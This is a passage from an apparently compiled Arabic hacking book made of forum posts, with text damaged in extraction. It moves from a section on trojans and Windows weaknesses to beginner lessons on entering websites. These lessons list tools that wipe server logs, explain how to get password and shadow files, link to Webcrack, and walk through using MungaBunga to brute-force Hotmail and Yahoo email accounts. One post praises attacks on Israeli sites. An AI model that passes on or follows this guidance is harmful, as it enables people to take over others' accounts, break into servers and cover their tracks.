المستخدمين لشبكة النترنت، سواء كان هذا الختراق لغرض التجسس وسرقة الملفات أو لغرض التخريب ومسح الملفات. بالطبع فإننا سنلمح لهذه البرامج تلميحا، ولن نذكر أسماءها وذلك حتى ل يتم إساءة

استغللها.

):Viruses- الفيروسات (1 عندما يتم التحدث عن الخطار الموجودة في الحاسب اللي، تتوجه أذهان المستمعين تلقائيا للتفكير في الفيروسات، نظرا لنتشارها وقوة تأثيرها التخريبية على أجهزة الحاسب اللي. ولعله من المناسب عدم

الطالة في الحديث عن الفيروسات، فالغالبية (إن لم يكن الكل) يعرفون خطرها وتأثيرها على أجهزة المستخدمين.

):Trojans- التروجان (2 التروجان أو أحصنة طروادة هي البرامج التي يكون في ظاهرها أنها تقوم بأداء وظيفة مفيدة للمستخدم

ولكنها في الحقيقة وخلف الكواليس تقوم بعمل وظيفة أخرى (غالبا مخربة) بدون علم المستخدم. وقد انتشرت هذه النوعية بكثرة في النترنت، نظرا لسهولة انخداع المستخدم بها ونظرا لما تعطيه للمخترقين من

إمكانيات تصل في بعض الحيان إلى التحكم شبه الكامل في جهاز المستخدم الضحية. و" باك اوريفيسNetBusلعل من أشهر التروجان المنتشرة في النترنت التروجان المسماة بـ "نت باس"

"Back Orifice " و "سب سيفين SubSevenوطريقة عملها متشابهة وهي أن يقوم المخترق . بإخفاء التروجان في أحد الملفات والتي يقوم المستخدمون الخرون بسحبها ظنا منهم بأن هذه الملفات تقوم بوظائف مفيدة لهم، وعندما يقوم المستخدم بتنفيذ هذا الملف فإنه يقوم وبدون علمه بتركيب خادم للتروجان

) من التحكم في جهازclientداخل جهازه بحيث يتمكن المخترق (باستخدام برنامج عميل للتروجان المستخدم الضحية.

تتشابه هذه التروجان في الوظائف التي تمكن المخترق من القيام بها، وتتراوح خطورة الوظائف من التجسس على الجهاز ( مثل سرقة الملفات والبريد اللكتروني وكلمات السر المختلفة) حتى العبث بجهاز

) أو إظهار رسالة مضحكة للمستخدم أو تشغيل ملفCD-ROMالمستخدم بإخراج القراص المضغوطة ( صوت وغيرها من الوظائف الخرى المزعجة.

13

Page 14: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

صورة تبين واجهة برنامج نت باس ويظهر فيها الوظائف المختلفة التي يمكن للهاكر القيام بها

- المشاركة في الطباعة والملفات في ويندوز:3 من المعروف أن نظام ويندوز يسمح للمستخدم بتحديد أحد المجلدات أو القراص الصلبة في جهازه للمشاركة

من قبل أشخاص آخرين على الشبكة. بالطبع فإن هذه الخاصية مفيدة جدا ولها تطبيقات كثيرة نافعة للمستخدم، ولكن عندما تكون متصل بالنترنت فإن كل من يرى جهازك سيستطيع أن يرى هذه المجلدات التي

وضعتها للمشاركة ويبقى العائق الوحيد للدخول عليها هو الحصول على كلمة السر. طبعا قد تتساءل "كيف يستطيع الخرون الوصول لي ؟ وأنا جهاز ضمن المليين من الجهزة على النترنت" يؤسفني أن أقول لك أنه يتوافر الكثير من البرامج (وكما قلنا فلن نذكر أسماءها حتى ل يساء استخدامها ) والتي تمكن للشخص

من البحث عن المجلدات الموضوعة للمشاركة في أجهزة المستخدمين. وبعد الحصول على قائمة بهذه الجهزة فإنه ما على المخترق إل أن يقوم بتشغيل برنامج يقوم بمحاولة "تخمين" كلمة السر (ويوجد أيضا الكثير من البرامج من هذا النوع) والتي تقوم بتجريب آلف الكلمات والتي تم تخزينها مسبقا في ملف حتى

تصل إلى كلمة السر الخاصة بالمجلد الموضوع للمشاركة. وما يزيد الطين بلة أن بعض المستخدمين يقومون بمشاركة القرص الصلب بكامله !! وبعضهم يستخدم كلمة سر بسيطة من حرف أو حرفين !! مما يسهل

المهمة على الهاكر ويجعله يحتار في أي الملفات يسرق وأيها يترك !!

14

Page 15: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

أحد البرامج التي تقوم بالبحث عن المجلدات الموضوعة المشاركة

- سرقة كلمة السر المخزنة:4 يقوم نظام ويندوز بتخزين كلمة السر في ملف وذلك لكي يسترجعها بسرعة في حالة الحاجة إليها، بالطبع

) ، ولكن ل شيء يستعصي على الهاكرز. فحينencryptedفإن كلمة السر يتم تخزينها بشكل مشفر( ) فإن كلمة السر الخاصة بجهازك هي ملك لهPWLحصول الهاكر على هذا الملف (والذي ينتهي بالمتداد

وذلك لوجود العديد من البرامج التي تقوم بفك تشفير هذا الملف والحصول على كلمة السر. بالطبع فإن نظام ، ولكنها مسألة وقت حتى95 يحتوي على تشفير أقوى من الذي كان موجودا في نظام ويندوز98ويندوز

يقوم الهاكرز بإيجاد برنامج يقوم بكسر هذا التشفير.

- برامج وتطبيقات النترنت5 إن تطبيقات النترنت ليست مجرد متصفحات فحسب ! بل إن هناك العديد من التطبيقات والبرامج الخرى التي

يتم استخدامها في النترنت. ولكن هذه البرامج قد تحتوي على العديد من الثغرات المنية التي تكون الباب الشهير الذيICQالمشرع الذي يستخدمه الهاكر للدخول في جهازك و إيذائك ! ومن هذه البرامج برنامج

يستخدمه المليين من المستخدمين في النترنت. وهو يعتبر من أكثر البرامج شعبية بين مستخدمي النترنت نظرا لما يقدمه من خدمات تسهل التواصل بين المستخدمين. ولكنه أيضا من أكثر البرامج شعبية للهاكرز

نظرا لما يقدمه من إمكانيات للتخريب والعبث بأجهزة ضحاياهم. فيوجد في النترنت العديد من البرامج التي الخاصIPتقوم بمهاجمة المستخدمين لهذا البرنامج، ويختلف تأثير هذه البرامج من الحصول على رقم

بالمستخدم إلى القيام بإرسال كمية هائلة من البيانات لديه حتى يتوقف الجهاز عن الستجابة للمستخدم ممايضطره للقيام بعملية إعادة للتشغيل!

- المواقع المشبوهة:6- 6 من فترة لخرى يتم اكتشاف الكثير من الثغرات المنية في المتصفحات ويتم استغلل هذه الثغرات بشكل كبير من قبل أصحاب مواقع الهاكرز. هذه الثغرات قد تمكن المخترق من الحصول على بعض الملفات والمعلومات الشخصية من جهازك. لذا يجب عليك الحذر عند زيارة المواقع التي يشتبه في كون أصحابها من المخترقين

نظرا لقدرة أصحاب المواقع على وضع بريمجات في مواقعهم لستغلل الثغرات المنية في متصفحك والدخول

15

Page 16: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

) يقوم بتكرارscriptإلى جهازك. وأبسط المثلة على ذلك ما يقوم به بعض المخربون من وضع بريمج ( تشغيل برنامج المتصفح وفتح نوافذ جديدة حتى تنتهي موارد النظام ويصبح ل يستجيب للمستخدم مما

وما فوق4يضطره لعادة تشغيل الجهاز ! بالطبع فإن هذه الثغرة تم تلفيها في متصفح إنترنت اكسبلورر ولكنها تعطي مثال بسيطا للتخريب الذي ممكن أن يقوم به المخترقون.

- الخدمات الضافية:7 يشتمل نظام التشغيل على بعض الخدمات الضافية التي قد ل يحتاجها المستخدم والتي قد تكون المدخل إلى

وخادم بريد إلكتروني (FTPجهازك، فمثل بعض الصدارات من نظام ويندوز تحتوي على خادم ويب وخادم SMTPوهي ل تستخدم من قبل غالب المستخدمين ولكنها تحتوي في أغلب الحيان على ثغرات أمنية (

تمكن المخترقين من العبث بجهازك. ويتم دائما إصدار تعديلت لهذه المشاكل المنية ولكن أغلب المستخدمين ل يقومون بتركيبها. لذا فمن المستحسن أثناء تركيب نظام التشغيل أن يقوم المستخدم بإلغاء تركيب هذه

الخدمات عندما ل يكون محتاجا لها وفي حالة كان المستخدم محتاجا لها، فمن المستحسن إيقاف تشغيلها عن اتصاله بالنترنت حتى ل يكون المنفذ الذي تعمل عليه هذه البرامج مفتوحا مما يسد الطريق على المخترقين

الذي يريدون استغلل هذه الخدمات للدخول في جهازك.

بالطبع فإن ما ذكرناه في هذا المقال ل يشمل جميع الطرق التي يستخدمها الهاكرز ، ولكنه كاف لعطاء فكرة عن هذه الطرق ورفع درجة الحذر لدى المستخدمين عن اتصالهم بالنترنت، مما يسهم في التقليل من

احتمالية تعرضهم للختراق. في العدد القادم بإذن ال سنقوم بالتحدث عن الطرق والبرامج الدفاعية التي يجب على المستخدم استخدامها

لتقاء الهاكرز و شرورهم.

انتهى،،،

"المن عبر النترنت"

16

Page 17: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

<ةةةةة ةة ةةةةة ةةةةة>

>JawaDal <ةةةةةة:

>z3r0 <ةةةةةةة:

هناك الكثير الذي يجب ان تعرفوه قبل ان تفكروا في تعلم اختراق المواقع و السيرفرات here we G0حسناا

. يكتبوا شويهshell account او dosالكثير من الناس يعملوا هاكينج من غير ما يعرفوا.. بيفتحوا ال .ديه مش ثغره!. لقد تم اختراقك!!!it rebootsاوامر و بووم.

في الدوس عندك و تدوس انتر/FTP ftp://hostnameحتى لما تستخدم امر بسيط مثل: و عملت سكان على سايت و لقيت كذاGFI LANguard network security scannerاو عندك

.. بتدوس عليه و تتصل بالموقع..و نفس الشيئ عن طريق التلنت..هذا يعني21بورت مفتوح و منهم بورت انه تم اختراقك!!

... و اي حاجه تانيهcd lcd dir ls بسيطه زي: ftp باوامر log inده عشان لما بتعمل LOGS...(LOG.FILES) 1 في حاجه اسمهاlog inلن مجرد ماتعمل

؟LOGايه بقى ال ده؟ ) و يحصلوا على معلوماتloged in ديه بتسجل كل شئ عن كل شخص اتصل بالجهاز(log filesال

مثل:

يرون متى عملت الهاكينج بالضبطمن اي موقع اتيت

onlineفضلت اد ايه بتاعك <<<<<<<IP Addressال (اسم الجهاز)host nameال

القارهالدولهالمدينه

المتصفحنظام التشغيل

screen resolutionالالوان الشاشه

)<<<<ISPمزود الخدمه الخاص بك(

مهمه:log files انواع 3هناك WTMPيسجل كل دخول\خروج، مع ميعاد الدخول\الخروج بالضافه الى ال - host و tty UTMP من- Onlneفي هذه اللحظه

LASLOGمن اي جاء الدخول\خروج-

track you) سوف يوقع بك(log.filesو الكثير الكثير!! لذا لو الدمن اراد ان يلقي نظره عليهم (down... (

ربما تقول: مفيش مشكله انا هاستخدم بروكسي! بس ادي حلجه لزم تعرفها عن البروكسيهات--تلنت او اي شئ اخر!FTPجهازك-->خادم البروكسي-->الموقع--

لو اخترقت موقع و الدمن عاوز يعرف انت مين.لو معاه شويه فلوس هيعرف!او حتي يخترق البروكسيسيرفر و هيجيبك .. نفس الكلم لو بتستخدم اكثر من بروكسي

--...so onجهازك-->خادم البروكسي الول-->خادم البروكسي الثاني-->الثالث--يقدر يجيبك بس هيحتاج فلوس كثير و وقت اكثر!!لكن في النهايه يقدر..

:-Wingateلكن تقدر ايضا تستخدم شيئ اسمه..

17

Page 18: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

Wingateهو بروكسي يسمح بمشاركه كونكشن انترنت واحد او اكثر.. فائده ال Wingateانه سيخفي عن الكمبيوتر الذي ستتصل به!!IPال

نحتاج بعض الشخاص الذكياء ليعلمونا كيف نستخدمه و اين نجده؟!1لكن للسف هذا كل ما اعرفه عنه..ماذا ايضاا....اممممممــم

.. و كيف تؤمنweb على الanonymousاه تذكرت!!.. قبل كل شئ يجب ان تعرف كيف تظل . امسح ملفاتzone alarm مثل الfirewall. استخدم spywareجهازك؟!!......مثل ال

الهيستوري(كالكوكيز و النترنت هيستوري و ملفات النترنت المؤقته..و الملفات الشخصيه و اللوق) انا افعل يجب ان يكونwindows washerهذه الشياء كل يوم قبل ان ادخل عالنت!! لدي برنامج رائع اسمه

عندك., لقد خصلت عليه من المدرسه.. سرقته هاهاها.

how to او how to Stay anonymous on the webو الكثير. اذهب لجوجل و اكتب secure to secure my computer

او زور موقع امني جيد و ابحث عن شئ كهذا .. و انا متأكد انك ستجد الكثير .. انه مجاني .. يجب ان يكون عندك لو كنت تريدPreety Good Privacy (PGP)dو ل تنسى ال

اختراق موقع و تترك ايميلك فيه!/http://www.pgpi.orgتستطيع ان تحصل عليه من:

ok!اظن ان هذا كل ما يمكنني كتابته لكن هناك الكثير لكن يجب ان تبحث عنه

ارجوا ان يعلمك هذا الدرس شيئا يا اخواني

لكن لدي سؤال الن .. و لست الوحيد الذي يحتاج الجابه .. هذه الجابه يجب ان يعرفها الجميع قبل ان يتعلمالهاكينج

؟ و اين نجده؟wingate-كيف تستخدم ال1كيف نمسح اللوقز؟ و كيف نجدهم؟ و كيف نتأكد ان كل شئ على ما يرام؟!و كيف نتأكد اننا لم نترك اي اثار

tracksخلفنا؟ log modifierها هو برنامج اعرفه: و اسمه

ah-1_0b.tar clear.c cloak2.c invisible.c marryv11.c wzap.c wtmped.c zap.c

==================================================

========================================== anonymousهذا يا اخي كل ما عرفته في اخر اسبوعين. و سألت سؤالين او اكثر عن كيفيه البقاء

عالنت و عن استخدام البروكسيز و بعض الناس جاوبوني. لكن بالنهايه ليس المهم كم سؤال سألت .. يجبان تجد الجابه هذا هو المهم.!!! لذا ارجو يا اخي ان تبحث في هذا المجال اول ثم بعدها تتعلم الختراق.

انتهى،،،

"أمن الشبكات"

18

Page 19: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

<ةةةةة ةة ةةةةة ةةةةة>

<ةةةةةة:ةةةةةة>

فى هذا الموضووع سأتناول بعض طرق الحماية نقل عن كتاب .وهذا لفتقار هذا القسم لمواضيع مثل هذه .

لذلك أرجو سماع وزاع ضميركم .--------------------------------------------------------

- عرض لبعض المخاطر المنية التي قد تتعرض لها الشبكة و كيفية الوقاية منها. 1- وصف لعلقة الولوج الى الشبكة بأمنها. 2- كيفية حماية الموارد بواسطة تراخيص الوصول. 3. ACL- شرح لمكونات 4- شرح لعملية تفحص التراخيص. 5

أي شبكة قد تكون عرضة للوصول غير المرخص لي مما يلي:

- المعدات. 1

- البيانات. 3

- عمليات الشبكة. 3

- الموارد. 4

تعتمد درجة أمن الشبكة على مدى حساسية البيانات المتداولة عبر الشبكة.

و يتم تنظيم المن وفقا لنوع الشبكة ، ففي شبكات الند للند كل جهاز يتحكم في أمنه الخاص ، بينما يتحكمالمزود في أمن شبكات الزبون المزود.

و هناك بعض الجراءات التي تساعد في المحافظة على أمن الشبكة:

- التدريب المتقن للمستخدمين على التعامل مع إجراءات المن. 1

- التأكد من أمن المعدات و صعوبة الوصول اليها من قبل غير المخولين. 2

- حماية السلك النحاسية و إخفاءها عن العين لنها قد تكون عرضة للتجسس. 3

National- تشفير البيانات عند الحاجة أما مقاييس التشفير فتضعها وكالة المن الوطني المريكية 4Security Agency (NSA .(

- تزويد المستخدمين بأجهزة ل تحتوي على محركات أقراص مرنة أو مضغوطة أو حتى أقراص صلبة ، و5 و عند تشغيل هذه الجهزة يقومROM Boot Chipتتصل هذه الجهزة بالمزودات باستخدام رقاقة إقلع

للجهاز ليبدأ بالعمل. RAMالمزود بتحميل برنامج القلع في ذاكرة

-استخدام برامج لتسجيل جميع العمليات التي يتم إجراؤها على الشبكة لمراجعتها عند الضرورة. 6

للمستخدمين للوصول للبيانات و المعدات كل حسب طبيعة عمله و فيPermissions- إعطاء تصاريح 7هذه الحالة يجب مشاركة البيانات و المعدات للسماح للخرين باستخدامها.

تحدد النشطة و العمليات المسموح لهم إجراءها على النظام. Rights- تزويد المستخدمين بحقوق 8

19

Page 20: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

هناك نظامان أساسيان لعطاء التصاريح و الحقوق :

- المشاركة المحمية بكلمة مرور. 1

- تصاريح الوصول. 2

في النظام الول يتم تعيين كلمة سر لكل من الموارد المطلوب مشاركتها و يتم الوصول لهذه الموارد فقط منقبل من لديه كلمة السر.

كما تستطيع تحديد درجة الوصول هل هي للقراءة فقط أم وصول كامل أم وفقا لكلمة السر.أنظر الصورة.

في النظام الثاني يتم تعيين الحقوق و إعطاء التصاريح لكل مستخدم أو مجموعة مستخدمين ، و يكفي أن يدخل المستخدم كلمة المرور عند الدخول الى نظام التشغيل ليتعرف النظام على حقوق هذا المستخدم و

التصاريح المتوفرة له، و يعتبر هذا النظام أكثر أمنا من النظام السابق و يعطي مدير الشبكة تحكما أكبر بكلمستخدم.

Securityعند إدخال السم و كلمة المرور يتم تمرير هذه المعلومات الى مدير أمن الحسابات Accounts Manager (SAM فإذا كان الولوج الى جهاز (Workstationفإن المعلومات يتم

فإنDomainمقارنتها مع قاعدة بيانات حسابات المن المحلية في الجهاز، أما إذا كان الولوج الى نطاق الذي يقارنها مع قاعدة بيانات حسابات النطاق، فإذا كان اسمSAMالمعلومات يتم إرسالها الى مزود

المستخدم أو كلمة المرور غير صالحين فإن المستخدم يمنع من الدخول الى النظام، أما إذا كانا صحيحين فإن

20

Page 21: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

تعرف النظام بالمستخدم فترة ولوجه وAccess Tokenنظام المن الفرعي يقوم بإصدار بطاقة ولوج تحتوي هذه البطاقة على المعلومات التالية:

) و هو رقم فريد خاص بكل حساب. Security Identifier (SID- المعرف المني 1

و هي التي تحدد المجموعة التي ينتمي لها المستخدم. Group SIDs- معرفات المجموعة 2

و هي تمثل الحقوق الممنوحة لحسابك. Privileges- المتيازات 3

عند محاولتك التصال من جهازك بجهاز آخر على شبكتك و يطلقAccess Tokenكما أنه يتم إصدار . Remote Logonعلى هذا الجراء الولوج عن بعد

من المور التي يجب مراعاتها عند الحديث عن أمن الشبكة هو المحافظة على أمن الموارد مثل الطابعات ومحركات القراص و الملفات و التي يقوم مدير الشبكة بتعيين تصاريح لستخدام هذه الموارد.

و من التصاريح التي قد تعطى للوصول الى الملفات ما يلي:

- تصريح قراءة و يسمح لك بعرض و نسخ الملفات. 1

- تصريح تنفيذ للتطبيقات. 2

- تصريح كتابة و يسمح بالتعديل في محتوى الملفات. 3

. No Access- ممنوع الستخدام 4

و التصاريح ممكن منحها لمستخدم أو مجموعة من المستخدمين و هذا أسهل.

) و كل معلومة يتمAccess Control List (ACLيمتلك كل مورد من الموارد قائمة تحكم بالوصول ). Access Control Entry (ACE يطلق عليها ACLإدخالها في

للمستخدم أو مجموعته الممنوحةSID عند منح التصريح لستخدام المورد و تحتوي على ACEيتم إنشاء التصريح بالضافة الى نوع التصريح، فلو افترضنا أن مدير مجموعة ما قد منح تصريح قراءة و تصريح

علىACE الخاص بالملف و سيحتوي ACL جديد يتم إنشاؤه ثم إضافته الى ACEكتابة لملف ما فإن SID .لمدير المجموعة بالضافة الى تصريح قراءة و تصريح كتابة

: ACEهناك نوعان ل

. AccessAllowed- الوصول مسموح 1

. No Access و يتم إنشاؤها إذا كان تصريح الوصول هو AccessDenied- الوصول ممنوع 2

ACE في كل SIDs الخاص به مع SIDو هكذا عندما يحاول مستخدم ما الوصول الى مورد ما يتم مقارنة للمورد. ACLمن

قبلAccessDenied ACEs بحيث تكون ACE يتم ترتيب 2000 و ويندوز NTفي ويندوز AccessAllowed ACEs فإذا وجد ، SID خاصتك في أي من AccessDenied ACEs

للتأكد من الحقوقAccessAllowed ACEsفستمنع من الوصول الى المورد و إل فسيبحث في مطابق لخاصتك فستعرض رسالة تحذير تمنعك من الوصول للمورد. SIDالممنوحة لك فإن لم يعثر على

ملخص الدرس:

21

Page 22: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

هناك بعض الجراءات التي يجب اتخاذها للمحافظة على أمن الشبكة و منها: تدريب المستخدمين ، حماية المعدات ، تشفير البيانات ، استخدام أجهزة عديمة القراص ، مراقبة العمليات

التي تجرى على الشبكة.

هناك نظامان أساسيان لعطاء التصاريح و الحقوق :

- المشاركة المحمية بكلمة مرور. 1

- تصاريح الوصول.2

انتهى،،،

"مصطلحات مهمة للمبتدئين في اختراق المواقع"

22

Page 23: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

<ةةةةة>

>BeReal:<ةةةةةة

السلم عليكم

لقد اعددت هذا الملف لخواني المبتدئين في تعلم طرق اختراق المواقع ، فقد

تواجههم بعض الكلمات التي قد تكون غريبة عليهم و التي قد ل يفهمونها ،

و بالتالي تشكل لهم بعض العواقب في مواصلة الفهم و التعلم . فال الموفق.

=====================================================================

):- و هو برنامج صغير موجود في الويندوز . و هو يعمل ككلينت Telnetتلنت (

أو وضعيته تكون دائما كزبون . أي أن باستطاعة هذا البرنامج التصال بالسيرفر

أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها . يستخدمه الهاكرز

غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ، و للتصال بالسيرفر

) للدخول الى الموقع بطريقة خفية 21عبر بورت معين و خصوصا بورت الف تي بي (

Anonymous Mode.لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات

و ستظهر شاشة التلنت.Start ==> Run ==> telnetلستخدام البرنامج ، اذهب الى

------------------------------------------------------------------------

:- و هي برامج موجودة للمسح على المواقع و كشف Scannerبرامج السكان أو

ثغراتهاإن وجدت ، فهي سريعة، كما أنها تملك قاعدة بيانات واسعة و كبيرة

) التي يتم تطبيقها على الموقعExploitsتحتوي على الثغرات أو الكسبلويت (

لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم ل . و من أمثلة

Omran Fast و Stealth و Shadow Security Scannerهذه البرامج، برنامج

Scanner. الخ ،

و لهذه البرامج أنواع مختلفة ، منها التي تقوم بعمل سكان على نظام أو سيرفر

و منها برامج المسح IISمعين مثل البرامج المختصة بالسكان على سيرفرات الـ

و ما الى ذلك .CGIعلى ثغرات السي جي اي فقط

23

Page 24: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

-----------------------------------------------------------------------

):- هي برامج تنفيذية تنفذ من خلل المتصفح . و لها عنوانExploitsاكسبلويت (

URL تقوم هذه الكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى ،

السيرفر و التجول فيه ، كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين

.Buffer Over Flow Exploitsفي السيرفر لعمل كراش له ، و هذا ما يسمى بـ

و منهاCGI Bugs أو ال CGI Exploitsهناك أنواع من الكسبلويت ، فمنها ال

، و منهاBuffer Over Flow Exploits و منها ال ، Unicodes Exploitsال

و التي تقوم بعملية حجب الخدمة DOS Exploits ،و منها الPHP Exploitsال

للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر

. و هناك بعض الكسبلويتات المكتوبة بلغة السي و يكونFire Wallأي فايروول

) .cامتدادها (.

هذه الكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها

أي الكسبلويت الى اكسبلويت تنفيذي عادي يستخدم من خلل المتصفح ، و لتحويل

الكسبلويت المكتبو بلغة السي هذه الى برنامجا تنفيذيا ، نحتاج إما الى

نظام التشغيل لينوكس او يونكس ، او الى اي كومبايلر يعمل ضمن نظام التشغيل

ويندوز . أشهر هذه الكومبايلرات ( المترجمات أو المحولت ) برنامج اسمه

Borland C++ Compiler.و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا

----------------------------------------------------------------------

:- هي برامج تستعملها السيرفرات لحمايتها من الولوج FireWallالجدار الناري

الغير شرعي لنظام ملفاتها من قبل المتطفلين . هي تمثل الحماية للسيرفر طبعا ،

و لكني أنوه بأن الفايروولت المستخدمة لحماية السيرفرات ( المواقع ) تختلف

عن تلك التي تستخدم لحماية الجهزة .

----------------------------------------------------------------------

24

Page 25: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

Token) هو ملف الباسورد المظلل -:Shadowed Passwd و الذي يكون فيه الباسورد (

. إن وجدت ملف الباسورد مظلل ، فيجب عليك حينها Shadowed أي xعلى شكل * أو

. تجده فيShadow fileالبحث عن ملف الباسورد الغير المظلل و الذي يسمى

/etc/shadow.

----------------------------------------------------------------------

Anonymouse هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد -:

اختراقه. هناك خاصية في برامج الف تي بي بنفس السم ، تستطيع ان تستعملها

في الدخول المجهول الى السيرفر و سحب الملفات منه .

----------------------------------------------------------------------

Valnerabletiesأي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب -:

و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى

استغللها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره .

أي ثغرة أو بالصح موضع الضعف و المكان Valnerableما هي مفردها ؟ :) ،

الغير مؤمن بشكل سليم . و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة

بالسيكيوريتي و أمن الشبكات و غيرها كالقائمة البريدية الموجودة في موقع

Security Focus. أو بوق تراك او غيرها

----------------------------------------------------------------------

passwd fileهو الملف الذي يحتوي على باسورد الروت و باسوردات الشخاص :

المصرح لهم بالدخول الى السيرفر . باسورد الموقع موجود في نفس الملف طبعا.

----------------------------------------------------------------------

: و هو المستخدم الجذري و الرئيسي للنظام ، له كل الصلحياتrootالجذر أو الـ

25

Page 26: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات.

غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن

نظام التشغيل لينوكس او يونكس و سولري و فري بي اس دي و غيرها .

----------------------------------------------------------------------

: هو الجهاز المستضيف للموقع ، اذ أن كل ملفات الموقع توضع فيه Serverالسيرفر

فهو جهاز كمبيوتر عاد كغيره من الجهزة لكنه ذو امكانيات عالية ككبر حجم القرص

ساعة ، و هذا هو سبب كون 24الصلب و سرعته الهائلة ، و هو متصل بالنترنت

على النترنت :) . قد يملك و يستضيف السيرفر أكثر من موقع 24المواقع شغالة

واحد، و هذا يعتمد من سيرفر لخر و من شركة لخرى. ضربة الهاكرز طبعا هي اختراق

السيرفر الذي يملك الكثير من المواقع ، فيسهل حينها اختراق جميع المواقع التي

تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو

سرقة بياناتها و تدميرها أو مسحها من النت تماما ، و هذا ما يحدث للمواقع

السرائيلية و بكثرة و ل الحمد . - جزاكم ال خيرا أيها المجاهدون - .

-----------------------------------------------------------------------

) : و هي نوع من أنواع الكسبلويتات التي Buffer over Flowبوفر أوفر فلو (

تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت الف تي بي

أو غيره لجل اضعاف اتصال السيرفر و فصل اتصاله بهذا بهذا البورت و للغاء الرقعة

الموجودة بها كي يتم استغللها مجددا - بعد عمل الكراش لها طبعا - يتم استغللها

في معاودة التصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها .

- اذ أنها تقوم بعملية اوفر لود على DOSو هي شبيهة نوعا ما بعملية حجب الخدمة -

جزء مركز من السيرفر .

انتهى،،،

"اختراق المواقع للمبتدئين"

الختراق للمبتدئين:::

26

Page 27: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

في هذا القسم سوف أقوم بشرح الطرق المستخدمة في اختراق المواقع بالنسبة للمبتدئين وهذه الطرق تعتمد

اعتمادا كليا على برامج التخمين. وهذه البرامج تحتوي على قائمة كبيرة تحتوي على كلمات سر يقوم

البرنامج بتجربها على الموقع الهدف الى أن يصل إلى كلمة السر الصحيحة الخاصة بالموقع الهدف وبعد

ذلك يسيطر المخترق على الموقع. لكن يعيب هذه الطريقة أنها تستمر إلى أوقات طويلة بالساعات وباليام

وهي مكلفة ماديا لن الجهاز سيبقى متصل طوال الوقت بالنترنت حتى يتم اكتشاف كلمة السرالصحيحة.

انتهى،،،

"Webcrack" الختراق ببرنامج

<ةةةةة ةة ةةةةة ةةةةة>

27

Page 28: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

<ةةةةةة: ةةةةةة>

مرحبا شباب

انا اعلم ان الكثير منك يعرفون هذا البرنامج لكن هل جربتوه .... احب اقول

انه واحد من اقوى البرامج لاختراق المواقع وانا من الشخاص الذين يعتمدون عليه

الشرح ...

28

Page 29: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

29

Page 30: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

وهذي وصلة البرنامج

http://www.dunbell.freeserve.co.uk/we bcrack40.zip

انتهى،،،

"MungaBunga"الختراق ببرنامج

30

Page 31: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

<ةةةةة>

>KING HAKER<ةةةةةة:

السلم عليكم و رحمه ال على اخوانى: الذى يعد من افضل برامج اختراق اليميل حتى الن و لكنMUNGA BUNGAاليوم نشرح برنامج

يوجد به عيب بسيط و هو انه ل يوجد به بروكسى اما مميزاته فكثيره جدا:

-سريع جدا فى تجربه الكلمات 1-يواصل التجربه تلقائيا بعد انقطاع الخط 2-يمكنك اختراق المواقع به ايضا 3-يعلن لك حاله اتصاله بسرفر اليميل الذى تخترقه 4-يمكنك التحكم فى عدد حروف الكلمات الذى سيبدا بها(حسب التوقع) 5-يحتوى على قائمه باسوردس خاصه بالهوت ميل و بها عدد هائل من الكلمات المتوقعه 6

و كذلك بالنسبه للياهو و السرفرات الخرى ايضا

و الن نبدا الشرح:

هذا شكل البرنامج عند تشغيله

تضع اليميل الذى ستخترقه 1فى رقم

و تضع قائمه الباسوردس المليئه بالكلمات الذى سيقوم البرنامج بتجربتها BROWSE تضغط 2فى

ايضا و تضع القائمه الخاصه بسرفر اليميل الذى ستخترقه (اذا كان فىBROWSE تضغط على 3فى الهوت ميل تضع قائمه الهوت ميل .....الخ)

هو زر بدء الهكر على اليميل و تجربه الكلمات 4

31

Page 32: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

يعرض الباسوردس التى يجربها الن (فى وقت الهكر) 5فى

يعرض الكلمات التى بها اخطاء و سيتم المحاوله بها مره اخرى 6فى

هى حاله التصال بالسرفر الموجود به اليميل 7

يعرض معلومات السرفر التابع لليميل الذى يجرب عليه 8فى

تذهب مباشره الى موقع البرنامج الرئيسى 9بالضغط على رقم

